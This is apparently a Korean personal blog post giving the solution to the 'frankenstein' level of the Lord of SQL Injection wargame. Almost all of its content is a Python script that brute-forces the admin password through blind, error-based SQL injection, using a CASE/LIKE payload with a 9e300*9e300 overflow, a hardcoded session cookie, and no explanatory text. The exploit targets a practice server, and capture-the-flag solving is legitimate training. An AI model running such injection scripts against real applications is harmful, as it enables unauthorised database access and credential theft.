LOS2 frankenstein

Wargame/Lord of SQL 2018. 10. 10. 09:38

import requests
import time

def request(payload):
    start = time.time()
    url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
    params = {'pw':payload}
    headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    response = requests.get(url,params=params,headers=headers)
    if "config.php" in response.text:
        return True
    else:
        return False

strings = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
admin_pw = ""
for i in range(1,100):
    for j in range(0,len(strings)):
        payload = "' or id='admin' and case when pw like '"+admin_pw+strings[j]+"%' then 1 else 9e300*9e300 end-- x "
        if request(payload) == True:
            admin_pw += strings[j]
            break
    if j == len(strings)-1:
        break
print "Find Admin Pw[*] = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS2 ouroboros (0)	2018.10.10
LOS2 phantom (0)	2018.10.10
LOS2 blue_dragon (0)	2018.10.10
LOS2 red_dragon (0)	2018.10.10
LOS2 green_dragon (0)	2018.10.10

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

LOS2 frankenstein

'Wargame > Lord of SQL' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바